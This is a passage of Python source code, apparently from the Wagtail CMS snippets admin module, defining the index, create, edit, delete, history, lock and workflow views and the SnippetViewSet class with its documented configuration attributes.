wagtail.admin.views.generic.permissions import PermissionCheckedMixin\nfrom wagtail.admin.views.generic.preview import (\n PreviewOnCreate,\n PreviewOnEdit,\n PreviewRevision,\n)\nfrom wagtail.admin.views.mixins import SpreadsheetExportMixin\nfrom wagtail.admin.views.reports.base import ReportView\nfrom wagtail.admin.viewsets import viewsets\nfrom wagtail.admin.viewsets.model import ModelViewSet\nfrom wagtail.log_actions import registry as log_registry\nfrom wagtail.models import (\n DraftStateMixin,\n Locale,\n LockableMixin,\n PreviewableMixin,\n RevisionMixin,\n WorkflowMixin,\n)\nfrom wagtail.models.audit_log import ModelLogEntry\nfrom wagtail.permissions import ModelPermissionPolicy\nfrom wagtail.snippets.action_menu import SnippetActionMenu\nfrom wagtail.snippets.models import SnippetAdminURLFinder, get_snippet_models\nfrom wagtail.snippets.permissions import user_can_edit_snippet_type\nfrom wagtail.snippets.side_panels import SnippetSidePanels\nfrom wagtail.snippets.views.chooser import SnippetChooserViewSet\n\n\n# == Helper functions ==\ndef get_snippet_model_from_url_params(app_name, model_name):\n \"\"\"\n Retrieve a model from an app_label / model_name combo.\n Raise Http404 if the model is not a valid snippet type.\n \"\"\"\n try:\n model = apps.get_model(app_name, model_name)\n except LookupError:\n raise Http404\n if model not in get_snippet_models():\n # don't allow people to hack the URL to edit content types that aren't registered as snippets\n raise Http404\n\n return model\n\n\n# == Views ==\n\n\nclass ModelIndexView(generic.IndexView):\n page_title = gettext_lazy(\"Snippets\")\n header_icon = \"snippet\"\n index_url_name = \"wagtailsnippets:index\"\n default_ordering = \"name\"\n\n def setup(self, request, *args, **kwargs):\n super().setup(request, *args, **kwargs)\n self.snippet_types = self._get_snippet_types()\n\n def _get_snippet_types(self):\n return [\n {\n \"name\": capfirst(model._meta.verbose_name_plural),\n \"count\": model.objects.all().count(),\n \"model\": model,\n }\n for model in get_snippet_models()\n if user_can_edit_snippet_type(self.request.user, model)\n ]\n\n def dispatch(self, request, *args, **kwargs):\n if not self.snippet_types:\n raise PermissionDenied\n return super().dispatch(request, *args, **kwargs)\n\n def get_list_url(self, type):\n return reverse(type[\"model\"].snippet_viewset.get_url_name(\"list\"))\n\n def get_queryset(self):\n return None\n\n def get_columns(self):\n return [\n TitleColumn(\n \"name\",\n label=_(\"Name\"),\n get_url=self.get_list_url,\n sort_key=\"name\",\n ),\n Column(\n \"count\",\n label=_(\"Instances\"),\n sort_key=\"count\",\n ),\n ]\n\n def get_context_data(self, **kwargs):\n ordering = self.get_ordering()\n reverse = ordering[0] == \"-\"\n\n if ordering in [\"count\", \"-count\"]:\n snippet_types = sorted(\n self.snippet_types,\n key=lambda type: type[\"count\"],\n reverse=reverse,\n )\n else:\n snippet_types = sorted(\n self.snippet_types,\n key=lambda type: type[\"name\"].lower(),\n reverse=reverse,\n )\n\n return super().get_context_data(object_list=snippet_types)\n\n def get_template_names(self):\n # We use the generic index template instead of model_index.html,\n # but we look for it anyway so users can customise this view's template\n # without having to override the entire view or the generic template.\n return [\n \"wagtailsnippets/snippets/model_index.html\",\n self.template_name,\n ]\n\n\nclass SnippetTitleColumn(TitleColumn):\n cell_template_name = \"wagtailsnippets/snippets/tables/title_cell.html\"\n\n\nclass IndexView(\n SpreadsheetExportMixin,\n generic.IndexViewOptionalFeaturesMixin,\n generic.IndexView,\n):\n view_name = \"list\"\n index_results_url_name = None\n delete_url_name = None\n any_permission_required = [\"add\", \"change\", \"delete\"]\n page_kwarg = \"p\"\n table_class = InlineActionsTable\n\n def get_base_queryset(self):\n # Allow the queryset to be a callable that takes a request\n # so that it can be evaluated in the context of the request\n if callable(self.queryset):\n self.queryset = self.queryset(self.request)\n return super().get_base_queryset()\n\n def _get_title_column(self, field_name, column_class=SnippetTitleColumn, **kwargs):\n # Use SnippetTitleColumn class to use custom template\n # so that buttons from snippet_listing_buttons hook can be rendered\n return super()._get_title_column(field_name, column_class, **kwargs)\n\n def get_columns(self):\n return [\n BulkActionsCheckboxColumn(\"checkbox\", accessor=lambda obj: obj),\n *super().get_columns(),\n ]\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n context.update(\n {\n \"model_opts\": self.model._meta,\n \"can_add_snippet\": self.permission_policy.user_has_permission(\n self.request.user, \"add\"\n ),\n }\n )\n\n if self.locale:\n context[\"translations\"] = [\n {\n \"locale\": locale,\n \"url\": self.get_index_url() + \"?locale=\" + locale.language_code,\n }\n for locale in Locale.objects.all().exclude(id=self.locale.id)\n ]\n\n return context\n\n def render_to_response(self, context, **response_kwargs):\n if self.is_export:\n return self.as_spreadsheet(\n context[\"object_list\"], self.request.GET.get(\"export\")\n )\n return super().render_to_response(context, **response_kwargs)\n\n\nclass CreateView(generic.CreateEditViewOptionalFeaturesMixin, generic.CreateView):\n view_name = \"create\"\n preview_url_name = None\n permission_required = \"add\"\n template_name = \"wagtailsnippets/snippets/create.html\"\n error_message = gettext_lazy(\"The snippet could not be created due to errors.\")\n\n def run_before_hook(self):\n return self.run_hook(\"before_create_snippet\", self.request, self.model)\n\n def run_after_hook(self):\n return self.run_hook(\"after_create_snippet\", self.request, self.object)\n\n def get_add_url(self):\n url = reverse(self.add_url_name)\n if self.locale:\n url += \"?locale=\" + self.locale.language_code\n return url\n\n def get_success_url(self):\n if self.draftstate_enabled and self.action != \"publish\":\n return super().get_success_url()\n\n # Make sure the redirect to the listing view uses the correct locale\n urlquery = \"\"\n if self.locale and self.object.locale is not Locale.get_default():\n urlquery = \"?locale=\" + self.object.locale.language_code\n\n return reverse(self.index_url_name) + urlquery\n\n def _get_action_menu(self):\n return SnippetActionMenu(self.request, view=self.view_name, model=self.model)\n\n def _get_initial_form_instance(self):\n instance = self.model()\n\n # Set locale of the new instance\n if self.locale:\n instance.locale = self.locale\n\n return instance\n\n def get_form_kwargs(self):\n return {\n **super().get_form_kwargs(),\n \"instance\": self._get_initial_form_instance(),\n \"for_user\": self.request.user,\n }\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n form = context.get(\"form\")\n action_menu = self._get_action_menu()\n side_panels = SnippetSidePanels(\n self.request,\n self.model(),\n self,\n show_schedule_publishing_toggle=getattr(\n form, \"show_schedule_publishing_toggle\", False\n ),\n )\n media = context.get(\"media\") + action_menu.media + side_panels.media\n\n context.update(\n {\n \"model_opts\": self.model._meta,\n \"action_menu\": action_menu,\n \"side_panels\": side_panels,\n \"media\": media,\n }\n )\n\n if self.locale:\n context[\"translations\"] = [\n {\n \"locale\": locale,\n \"url\": reverse(self.add_url_name)\n + \"?locale=\"\n + locale.language_code,\n }\n for locale in Locale.objects.all().exclude(id=self.locale.id)\n ]\n\n return context\n\n\nclass EditView(generic.CreateEditViewOptionalFeaturesMixin, generic.EditView):\n view_name = \"edit\"\n history_url_name = None\n preview_url_name = None\n revisions_compare_url_name = None\n usage_url_name = None\n permission_required = \"change\"\n template_name = \"wagtailsnippets/snippets/edit.html\"\n error_message = gettext_lazy(\"The snippet could not be saved due to errors.\")\n\n def run_before_hook(self):\n return self.run_hook(\"before_edit_snippet\", self.request, self.object)\n\n def run_after_hook(self):\n return self.run_hook(\"after_edit_snippet\", self.request, self.object)\n\n def get_history_url(self):\n return reverse(self.history_url_name, args=[quote(self.object.pk)])\n\n def get_usage_url(self):\n return reverse(self.usage_url_name, args=[quote(self.object.pk)])\n\n def _get_action_menu(self):\n return SnippetActionMenu(\n self.request,\n view=self.view_name,\n instance=self.object,\n locked_for_user=self.locked_for_user,\n )\n\n def get_form_kwargs(self):\n return {**super().get_form_kwargs(), \"for_user\": self.request.user}\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n form = context.get(\"form\")\n action_menu = self._get_action_menu()\n side_panels = SnippetSidePanels(\n self.request,\n self.object,\n self,\n show_schedule_publishing_toggle=getattr(\n form, \"show_schedule_publishing_toggle\", False\n ),\n live_object=self.live_object,\n scheduled_object=self.live_object.get_scheduled_revision_as_object()\n if self.draftstate_enabled\n else None,\n )\n media = context.get(\"media\") + action_menu.media + side_panels.media\n\n context.update(\n {\n \"model_opts\": self.model._meta,\n \"action_menu\": action_menu,\n \"side_panels\": side_panels,\n \"history_url\": self.get_history_url(),\n \"usage_url\": self.get_usage_url(),\n \"revisions_compare_url_name\": self.revisions_compare_url_name,\n \"media\": media,\n }\n )\n\n if self.locale:\n context[\"translations\"] = [\n {\n \"locale\": translation.locale,\n \"url\": reverse(\n self.edit_url_name,\n args=[quote(translation.pk)],\n ),\n }\n for translation in self.object.get_translations().select_related(\n \"locale\"\n )\n ]\n\n return context\n\n\nclass DeleteView(generic.DeleteView):\n view_name = \"delete\"\n page_title = gettext_lazy(\"Delete\")\n permission_required = \"delete\"\n header_icon = \"snippet\"\n\n def run_before_hook(self):\n return self.run_hook(\"before_delete_snippet\", self.request, [self.object])\n\n def run_after_hook(self):\n return self.run_hook(\"after_delete_snippet\", self.request, [self.object])\n\n def get_success_message(self):\n return _(\"%(model_name)s '%(object)s' deleted.\") % {\n \"model_name\": capfirst(self.model._meta.verbose_name),\n \"object\": self.object,\n }\n\n\nclass UsageView(generic.UsageView):\n view_name = \"usage\"\n template_name = \"wagtailsnippets/snippets/usage.html\"\n permission_required = \"change\"\n edit_url_name = None\n\n\nclass SnippetHistoryReportFilterSet(WagtailFilterSet):\n action = django_filters.ChoiceFilter(\n label=_(\"Action\"),\n choices=log_registry.get_choices,\n )\n user = django_filters.ModelChoiceFilter(\n label=_(\"User\"),\n field_name=\"user\",\n queryset=lambda request: ModelLogEntry.objects.all().get_users(),\n )\n timestamp = django_filters.DateFromToRangeFilter(\n label=_(\"Date\"), widget=DateRangePickerWidget\n )\n\n class Meta:\n model = ModelLogEntry\n fields = [\"action\", \"user\", \"timestamp\"]\n\n\nclass ActionColumn(Column):\n cell_template_name = \"wagtailsnippets/snippets/revisions/_actions.html\"\n\n def __init__(self, *args, object=None, view=None, **kwargs):\n super().__init__(*args, **kwargs)\n self.object = object\n self.view = view\n\n def get_cell_context_data(self, instance, parent_context):\n context = super().get_cell_context_data(instance, parent_context)\n context[\"revision_enabled\"] = isinstance(self.object, RevisionMixin)\n context[\"draftstate_enabled\"] = isinstance(self.object, DraftStateMixin)\n context[\"preview_enabled\"] = isinstance(self.object, PreviewableMixin)\n context[\"can_publish\"] = self.view.user_has_permission(\"publish\")\n context[\"object\"] = self.object\n context[\"view\"] = self.view\n return context\n\n\nclass HistoryView(ReportView):\n view_name = \"history\"\n index_url_name = None\n edit_url_name = None\n revisions_view_url_name = None\n revisions_revert_url_name = None\n revisions_compare_url_name = None\n revisions_unschedule_url_name = None\n any_permission_required = [\"add\", \"change\", \"delete\"]\n template_name = \"wagtailsnippets/snippets/history.html\"\n title = gettext_lazy(\"Snippet history\")\n header_icon = \"history\"\n is_searchable = False\n paginate_by = 20\n filterset_class = SnippetHistoryReportFilterSet\n table_class = InlineActionsTable\n\n def setup(self, request, *args, pk, **kwargs):\n self.pk = pk\n self.object = self.get_object()\n super().setup(request, *args, **kwargs)\n\n def get_object(self):\n object = get_object_or_404(self.model, pk=unquote(self.pk))\n if isinstance(object, DraftStateMixin):\n return object.get_latest_revision_as_object()\n return object\n\n def get_page_subtitle(self):\n return str(self.object)\n\n def get_columns(self):\n return [\n ActionColumn(\n \"message\",\n object=self.object,\n view=self,\n classname=\"title\",\n label=_(\"Action\"),\n ),\n UserColumn(\"user\", blank_display_name=\"system\"),\n DateColumn(\"timestamp\", label=_(\"Date\")),\n ]\n\n def get_context_data(self, *args, object_list=None, **kwargs):\n context = super().get_context_data(*args, object_list=object_list, **kwargs)\n context[\"object\"] = self.object\n context[\"subtitle\"] = self.get_page_subtitle()\n context[\"model_opts\"] = self.model._meta\n return context\n\n def get_queryset(self):\n return log_registry.get_logs_for_instance(self.object).select_related(\n \"revision\", \"user\", \"user__wagtail_userprofile\"\n )\n\n\nclass InspectView(generic.InspectView):\n view_name = \"inspect\"\n any_permission_required = [\"add\", \"change\", \"delete\"]\n\n\nclass PreviewOnCreateView(PreviewOnCreate):\n pass\n\n\nclass PreviewOnEditView(PreviewOnEdit):\n pass\n\n\nclass PreviewRevisionView(PermissionCheckedMixin, PreviewRevision):\n permission_required = \"change\"\n\n\nclass RevisionsCompareView(PermissionCheckedMixin, generic.RevisionsCompareView):\n permission_required = \"change\"\n\n @property\n def edit_label(self):\n return _(\"Edit this %(model_name)s\") % {\n \"model_name\": self.model._meta.verbose_name\n }\n\n @property\n def history_label(self):\n return _(\"%(model_name)s history\") % {\n \"model_name\": self.model._meta.verbose_name\n }\n\n\nclass UnpublishView(PermissionCheckedMixin, generic.UnpublishView):\n permission_required = \"publish\"\n\n\nclass RevisionsUnscheduleView(PermissionCheckedMixin, generic.RevisionsUnscheduleView):\n permission_required = \"publish\"\n\n\nclass LockView(PermissionCheckedMixin, lock.LockView):\n permission_required = \"lock\"\n\n def user_has_permission(self, permission):\n if self.request.user.is_superuser:\n return True\n\n if permission == self.permission_required and isinstance(\n self.object, WorkflowMixin\n ):\n current_workflow_task = self.object.current_workflow_task\n if current_workflow_task:\n return current_workflow_task.user_can_lock(\n self.object, self.request.user\n )\n\n return super().user_has_permission(permission)\n\n\nclass UnlockView(PermissionCheckedMixin, lock.UnlockView):\n permission_required = \"unlock\"\n\n def user_has_permission(self, permission):\n if self.request.user.is_superuser:\n return True\n\n if permission == self.permission_required:\n # Allow unlocking even if the user does not have the 'unlock' permission\n # if they are the user who locked the object\n if self.object.locked_by_id == self.request.user.pk:\n return True\n\n if isinstance(self.object, WorkflowMixin):\n current_workflow_task = self.object.current_workflow_task\n if current_workflow_task:\n return current_workflow_task.user_can_unlock(\n self.object, self.request.user\n )\n\n return super().user_has_permission(permission)\n\n\nclass WorkflowActionView(workflow.WorkflowAction):\n pass\n\n\nclass CollectWorkflowActionDataView(workflow.CollectWorkflowActionData):\n pass\n\n\nclass ConfirmWorkflowCancellationView(workflow.ConfirmWorkflowCancellation):\n pass\n\n\nclass WorkflowStatusView(PermissionCheckedMixin, workflow.WorkflowStatus):\n permission_required = \"change\"\n\n\nclass WorkflowPreviewView(workflow.PreviewRevisionForTask):\n pass\n\n\nclass WorkflowHistoryView(PermissionCheckedMixin, history.WorkflowHistoryView):\n permission_required = \"change\"\n\n\nclass WorkflowHistoryDetailView(\n PermissionCheckedMixin, history.WorkflowHistoryDetailView\n):\n permission_required = \"change\"\n\n\nclass SnippetViewSet(ModelViewSet):\n \"\"\"\n A viewset that instantiates the admin views for snippets.\n \"\"\"\n\n #: The model class to be registered as a snippet with this viewset.\n model = None\n\n #: The icon to use across the admin for this snippet type.\n icon = \"snippet\"\n\n #: Register a custom menu item for this snippet type in the admin's main menu.\n add_to_admin_menu = False\n\n #: Register a custom menu item for this snippet type in the admin's \"Settings\" menu.\n #: This takes precedence if both ``add_to_admin_menu`` and ``add_to_settings_menu`` are set to ``True``.\n add_to_settings_menu = False\n\n #: The displayed label used for the menu item that appears in Wagtail's sidebar.\n #: If unset, the title-cased version of the model's :attr:`~django.db.models.Options.verbose_name_plural` will be used.\n menu_label = None\n\n #: The ``name`` argument passed to the ``MenuItem`` constructor, becoming the ``name`` attribute value for that instance.\n #: This can be useful when manipulating the menu items in a custom menu hook, e.g. :ref:`construct_main_menu`.\n #: If unset, a slugified version of the label is used.\n menu_name = None\n\n #: An integer determining the order of the menu item, 0 being the first place.\n #: If the viewset is registered within a :class:`SnippetViewSetGroup`,\n #: this is ignored and the menu item order is determined by the order of :attr:`~SnippetViewSetGroup.items`.\n menu_order = None\n\n #: A subclass of ``wagtail.admin.filters.WagtailFilterSet``, which is a subclass of `django_filters.FilterSet `_. This will be passed to the ``filterset_class`` attribute of the index view.\n filterset_class = None\n\n #: A list or tuple, where each item is either:\n #:\n #: - The name of a field on the model;\n #: - The name of a callable or property on the model that accepts a single parameter for the model instance; or\n #: - An instance of the ``wagtail.admin.ui.tables.Column`` class.\n #:\n #: If the name refers to a database field, the ability to sort the listing by the database column will be offerred and the field's verbose name will be used as the column header.\n #:\n #: If the name refers to a callable or property, a ``admin_order_field`` attribute can be defined on it to point to the database column for sorting.\n #: A ``short_description`` attribute can also be defined on the callable or property to be used as the column header.\n #:\n #: This list will be passed to the ``list_display`` attribute of the index view.\n #: If left unset, the ``list_display`` attribute of the index view will be used instead, which by default is defined as ``[\"__str__\", wagtail.admin.ui.tables.UpdatedAtColumn()]``.\n list_display = None\n\n #: A list or tuple, where each item is the name of model fields of type ``BooleanField``, ``CharField``, ``DateField``, ``DateTimeField``, ``IntegerField`` or ``ForeignKey``.\n #: Alternatively, it can also be a dictionary that maps a field name to a list of lookup expressions.\n #: This will be passed as django-filter's ``FilterSet.Meta.fields`` attribute. See `its documentation `_ for more details.\n #: If ``filterset_class`` is set, this attribute will be ignored.\n list_filter = None\n\n #: A list or tuple, where each item is the name of a field, an attribute, or a single-argument callable on the model.\n list_export = []\n\n #: The base file name for the exported listing, without extensions. If unset, the model's :attr:`~django.db.models.Options.db_table` will be used instead.\n export_filename = None\n\n #: The number of items to display per page in the index view. Defaults to 20.\n list_per_page = 20\n\n #: The number of items to display in the chooser view. Defaults to 10.\n chooser_per_page = 10\n\n #: The default ordering to use for the index view. Can be a string or a list/tuple in the same format as Django's :attr:`~django.db.models.Options.ordering`.\n ordering = None\n\n #: The fields to use for the search in the index view.\n #: If set to ``None`` and :attr:`search_backend_name` is set to use a Wagtail search backend,\n #: the ``search_fields`` attribute of the model will be used instead.\n search_fields = None\n\n #: The name of the Wagtail search backend to use for the search in the index view.\n #: If set to a falsy value, the search will fall back to use Django's QuerySet API.\n search_backend_name = \"default\"\n\n #: Whether to enable the inspect view. Defaults to ``False``.\n inspect_view_enabled = False\n\n #: The model fields or attributes to display in the inspect view.\n #:\n #: If the field has a corresponding :meth:`~django.db.models.Model.get_FOO_display`\n #: method on the model, the method's return value will be used instead.\n #:\n #: If you have ``wagtail.images`` installed, and the field's value is an instance of\n #: ``wagtail.images.models.AbstractImage``, a thumbnail of that image will be rendered.\n #:\n #: If you have ``wagtail.documents`` installed, and the field's value is an instance of\n #: ``wagtail.docs.models.AbstractDocument``, a link to that document will be rendered,\n #: along with the document title, file extension and size.\n inspect_view_fields = []\n\n #: The fields to exclude from the inspect view.\n inspect_view_fields_exclude = []\n\n #: The URL namespace to use for the admin views.\n #: If left unset, ``wagtailsnippets_{app_label}_{model_name}`` is used instead.\n admin_url_namespace = None\n\n #: The base URL path to use for the admin views.\n #: If left unset, ``snippets/{app_label}/{model_name}`` is used instead.\n base_url_path = None\n\n #: The URL namespace to use for the chooser admin views.\n #: If left unset, ``wagtailsnippetchoosers_{app_label}_{model_name}`` is used instead.\n chooser_admin_url_namespace = None\n\n #: The base URL path to use for the chooser admin views.\n #: If left unset, ``snippets/choose/{app_label}/{model_name}`` is used instead.\n chooser_base_url_path = None\n\n #: The view class to use for the index view; must be a subclass of ``wagtail.snippet.views.snippets.IndexView``.\n index_view_class = IndexView\n\n #: The view class to use for the create view; must be a subclass of ``wagtail.snippet.views.snippets.CreateView``.\n add_view_class = CreateView\n\n #: The view class to use for the edit view; must be a subclass of ``wagtail.snippet.views.snippets.EditView``.\n edit_view_class = EditView\n\n #: The view class to use for the delete view; must be a subclass of ``wagtail.snippet.views.snippets.DeleteView``.\n delete_view_class = DeleteView\n\n #: The view class to use for the usage view; must be a subclass of ``wagtail.snippet.views.snippets.UsageView``.\n usage_view_class = UsageView\n\n #: The view class to use for the history view; must be a subclass of ``wagtail.snippet.views.snippets.HistoryView``.\n history_view_class = HistoryView\n\n #: The view class to use for the inspect view; must be a subclass of ``wagtail.snippet.views.snippets.InspectView``.\n inspect_view_class = InspectView\n\n #: The view class to use for previewing revisions; must be a subclass of ``wagtail.snippet.views.snippets.PreviewRevisionView``.\n revisions_view_class = PreviewRevisionView\n\n #: The view class to use for comparing revisions; must be a subclass of ``wagtail.snippet.views.snippets.RevisionsCompareView``.\n revisions_compare_view_class = RevisionsCompareView\n\n #: The view class to use for unscheduling revisions; must be a subclass of ``wagtail.snippet.views.snippets.RevisionsUnscheduleView``.\n revisions_unschedule_view_class = RevisionsUnscheduleView\n\n #: The view class to use for unpublishing a snippet; must be a subclass of ``wagtail.snippet.views.snippets.UnpublishView``.\n unpublish_view_class = UnpublishView\n\n #: The view class to use for previewing on the create view; must be a subclass of ``wagtail.snippet.views.snippets.PreviewOnCreateView``.\n preview_on_add_view_class = PreviewOnCreateView\n\n #: The view class to use for previewing on the edit view; must be a subclass of ``wagtail.snippet.views.snippets.PreviewOnEditView``.\n preview_on_edit_view_class = PreviewOnEditView\n\n #: The view class to use for locking a snippet; must be a subclass of ``wagtail.snippet.views.snippets.LockView``.\n lock_view_class = LockView\n\n #: The view class to use for unlocking a snippet; must be a subclass of ``wagtail.snippet.views.snippets.UnlockView``.\n unlock_view_class = UnlockView\n\n #: The view class to use for performing a workflow action; must be a subclass of ``wagtail.snippet.views.snippets.WorkflowActionView``.\n workflow_action_view_class = WorkflowActionView\n\n #: The view class to use for performing a workflow action that returns the validated data in the response; must be a subclass of ``wagtail.snippet.views.snippets.CollectWorkflowActionDataView``.\n collect_workflow_action_data_view_class = CollectWorkflowActionDataView\n\n #: The view class to use for confirming the cancellation of a workflow; must be a subclass of ``wagtail.snippet.views.snippets.ConfirmWorkflowCancellationView``.\n confirm_workflow_cancellation_view_class = ConfirmWorkflowCancellationView\n\n #: The view class to use for rendering the workflow status modal; must be a subclass of ``wagtail.snippet.views.snippets.WorkflowStatusView``.\n workflow_status_view_class = WorkflowStatusView\n\n #: The view class to use for previewing a revision for a specific task; must be a subclass of ``wagtail.snippet.views.snippets.WorkflowPreviewView``.\n workflow_preview_view_class = WorkflowPreviewView\n\n #: The view class to use for the workflow history view; must be a subclass of ``wagtail.snippet.views.snippets.WorkflowHistoryView``.\n workflow_history_view_class = WorkflowHistoryView\n\n #: The view class to use for the workflow history detail view; must be a subclass of ``wagtail.snippet.views.snippets.WorkflowHistoryDetailView``.\n workflow_history_detail_view_class = WorkflowHistoryDetailView\n\n #: The ViewSet class to use for the chooser views; must be a subclass of ``wagtail.snippet.views.chooser.SnippetChooserViewSet``.\n chooser_viewset_class = SnippetChooserViewSet\n\n #: The prefix of template names to look for when rendering the admin views.\n template_prefix = \"wagtailsnippets/snippets/\"\n\n #: The template to use for the index view.\n index_template_name = \"\"\n\n #: The template to use for the results in the index view.\n index_results_template_name = \"\"\n\n #: The template to use for the create view.\n create_template_name = \"\"\n\n #: The template to use for the edit view.\n edit_template_name = \"\"\n\n #: The template to use for the delete view.\n delete_template_name = \"\"\n\n #: The template to use for the history view.\n history_template_name = \"\"\n\n #: The template to use for the inspect view.\n inspect_template_name = \"\"\n\n def __init__(self, model=None, **kwargs):\n # Allow model to be defined on the class, or passed in via the constructor\n self.model = model or self.model\n\n if self.model is None:\n raise ImproperlyConfigured(\n \"SnippetViewSet must be passed a model or define a model attribute.\"\n )\n\n self.model_opts = self.model._meta\n self.app_label = self.model_opts.app_label\n self.model_name = self.model_opts.model_name\n\n self.preview_enabled = issubclass(self.model, PreviewableMixin)\n self.revision_enabled = issubclass(self.model, RevisionMixin)\n self.draftstate_enabled = issubclass(self.model, DraftStateMixin)\n self.workflow_enabled = issubclass(self.model, WorkflowMixin)\n self.locking_enabled = issubclass(self.model, LockableMixin)\n\n self.menu_item_is_registered = (\n self.add_to_admin_menu or self.add_to_settings_menu\n )\n\n super().__init__(\n name=self.get_admin_url_namespace(),\n url_prefix=self.get_admin_base_path(),\n **kwargs,\n )\n\n if not self.list_display:\n self.list_display = self.index_view_class.list_display.copy()\n if self.draftstate_enabled:\n self.list_display += [LiveStatusTagColumn()]\n\n # This edit handler has been bound to the model and is used for the views.\n self._edit_handler = self.get_edit_handler()\n\n @property\n def revisions_revert_view_class(self):\n \"\"\"\n The view class to use for reverting to a previous revision.\n\n By default, this class is generated by combining the edit view with\n ``wagtail.admin.views.generic.mixins.RevisionsRevertMixin``. As a result,\n this class must be a subclass of ``wagtail.snippet.views.snippets.EditView``\n and must handle the reversion correctly.\n \"\"\"\n revisions_revert_view_class = type(\n \"_RevisionsRevertView\",\n (generic.RevisionsRevertMixin, self.edit_view_class),\n {\"view_name\": \"revisions_revert\"},\n )\n return revisions_revert_view_class\n\n @property\n def permission_policy(self):\n return ModelPermissionPolicy(self.model)\n\n @property\n def index_view(self):\n return self.index_view_class.as_view(\n model=self.model,\n queryset=self.get_queryset,\n template_name=self.get_index_template(),\n header_icon=self.icon,\n filterset_class=self.filterset_class,\n permission_policy=self.permission_policy,\n index_url_name=self.get_url_name(\"list\"),\n index_results_url_name=self.get_url_name(\"list_results\"),\n add_url_name=self.get_url_name(\"add\"),\n edit_url_name=self.get_url_name(\"edit\"),\n delete_url_name=self.get_url_name(\"delete\"),\n list_display=self.list_display,\n list_filter=self.list_filter,\n list_export=self.list_export,\n export_filename=self.get_export_filename(),\n paginate_by=self.list_per_page,\n default_ordering=self.ordering,\n search_fields=self.search_fields,\n search_backend_name=self.search_backend_name,\n )\n\n @property\n def index_results_view(self):\n return self.index_view_class.as_view(\n model=self.model,\n queryset=self.get_queryset,\n template_name=self.get_index_results_template(),\n header_icon=self.icon,\n filterset_class=self.filterset_class,\n permission_policy=self.permission_policy,\n index_url_name=self.get_url_name(\"list\"),\n index_results_url_name=self.get_url_name(\"list_results\"),\n add_url_name=self.get_url_name(\"add\"),\n edit_url_name=self.get_url_name(\"edit\"),\n delete_url_name=self.get_url_name(\"delete\"),\n list_display=self.list_display,\n list_filter=self.list_filter,\n list_export=self.list_export,\n export_filename=self.get_export_filename(),\n paginate_by=self.list_per_page,\n default_ordering=self.ordering,\n search_fields=self.search_fields,\n search_backend_name=self.search_backend_name,\n )\n\n @property\n def add_view(self):\n return self.add_view_class.as_view(\n model=self.model,\n template_name=self.get_create_template(),\n header_icon=self.icon,\n permission_policy=self.permission_policy,\n panel=self._edit_handler,\n form_class=self.get_form_class(),\n index_url_name=self.get_url_name(\"list\"),\n add_url_name=self.get_url_name(\"add\"),\n edit_url_name=self.get_url_name(\"edit\"),\n preview_url_name=self.get_url_name(\"preview_on_add\"),\n )\n\n @property\n def edit_view(self):\n # Any parameters passed here must also be passed in revisions_revert_view.\n return self.edit_view_class.as_view(\n model=self.model,\n template_name=self.get_edit_template(),\n header_icon=self.icon,\n permission_policy=self.permission_policy,\n panel=self._edit_handler,\n form_class=self.get_form_class(for_update=True),\n index_url_name=self.get_url_name(\"list\"),\n edit_url_name=self.get_url_name(\"edit\"),\n delete_url_name=self.get_url_name(\"delete\"),\n history_url_name=self.get_url_name(\"history\"),\n preview_url_name=self.get_url_name(\"preview_on_edit\"),\n lock_url_name=self.get_url_name(\"lock\"),\n unlock_url_name=self.get_url_name(\"unlock\"),\n usage_url_name=self.get_url_name(\"usage\"),\n revisions_compare_url_name=self.get_url_name(\"revisions_compare\"),\n revisions_unschedule_url_name=self.get_url_name(\"revisions_unschedule\"),\n workflow_history_url_name=self.get_url_name(\"workflow_history\"),\n confirm_workflow_cancellation_url_name=self.get_url_name(\n \"confirm_workflow_cancellation\"\n ),\n )\n\n @property\n def delete_view(self):\n return self.delete_view_class.as_view(\n model=self.model,\n template_name=self.get_delete_template(),\n header_icon=self.icon,\n permission_policy=self.permission_policy,\n index_url_name=self.get_url_name(\"list\"),\n delete_url_name=self.get_url_name(\"delete\"),\n usage_url_name=self.get_url_name(\"usage\"),\n )\n\n @property\n def usage_view(self):\n return self.usage_view_class.as_view(\n model=self.model,\n template_name=self.get_templates(\n \"usage\", fallback=self.usage_view_class.template_name\n ),\n header_icon=self.icon,\n permission_policy=self.permission_policy,\n index_url_name=self.get_url_name(\"list\"),\n edit_url_name=self.get_url_name(\"edit\"),\n )\n\n @property\n def history_view(self):\n return self.history_view_class.as_view(\n model=self.model,\n template_name=self.get_history_template(),\n permission_policy=self.permission_policy,\n index_url_name=self.get_url_name(\"list\"),\n edit_url_name=self.get_url_name(\"edit\"),\n revisions_view_url_name=self.get_url_name(\"revisions_view\"),\n revisions_revert_url_name=self.get_url_name(\"revisions_revert\"),\n revisions_compare_url_name=self.get_url_name(\"revisions_compare\"),\n revisions_unschedule_url_name=self.get_url_name(\"revisions_unschedule\"),\n )\n\n @property\n def inspect_view(self):\n return self.inspect_view_class.as_view(\n model=self.model,\n template_name=self.get_inspect_template(),\n permission_policy=self.permission_policy,\n edit_url_name=self.get_url_name(\"edit\"),\n delete_url_name=self.get_url_name(\"delete\"),\n fields=self.inspect_view_fields,\n fields_exclude=self.inspect_view_fields_exclude,\n )\n\n @property\n def revisions_view(self):\n return self.revisions_view_class.as_view(\n model=self.model,\n permission_policy=self.permission_policy,\n )\n\n @property\n def revisions_revert_view(self):\n return self.revisions_revert_view_class.as_view(\n model=self.model,\n template_name=self.get_edit_template(),\n header_icon=self.icon,\n permission_policy=self.permission_policy,\n panel=self._edit_handler,\n form_class=self.get_form_class(for_update=True),\n index_url_name=self.get_url_name(\"list\"),\n edit_url_name=self.get_url_name(\"edit\"),\n delete_url_name=self.get_url_name(\"delete\"),\n history_url_name=self.get_url_name(\"history\"),\n preview_url_name=self.get_url_name(\"preview_on_edit\"),\n lock_url_name=self.get_url_name(\"lock\"),\n unlock_url_name=self.get_url_name(\"unlock\"),\n usage_url_name=self.get_url_name(\"usage\"),\n revisions_compare_url_name=self.get_url_name(\"revisions_compare\"),\n revisions_unschedule_url_name=self.get_url_name(\"revisions_unschedule\"),\n revisions_revert_url_name=self.get_url_name(\"revisions_revert\"),\n workflow_history_url_name=self.get_url_name(\"workflow_history\"),\n confirm_workflow_cancellation_url_name=self.get_url_name(\n \"confirm_workflow_cancellation\"\n ),\n )\n\n @property\n def revisions_compare_view(self):\n return self.revisions_compare_view_class.as_view(\n model=self.model,\n 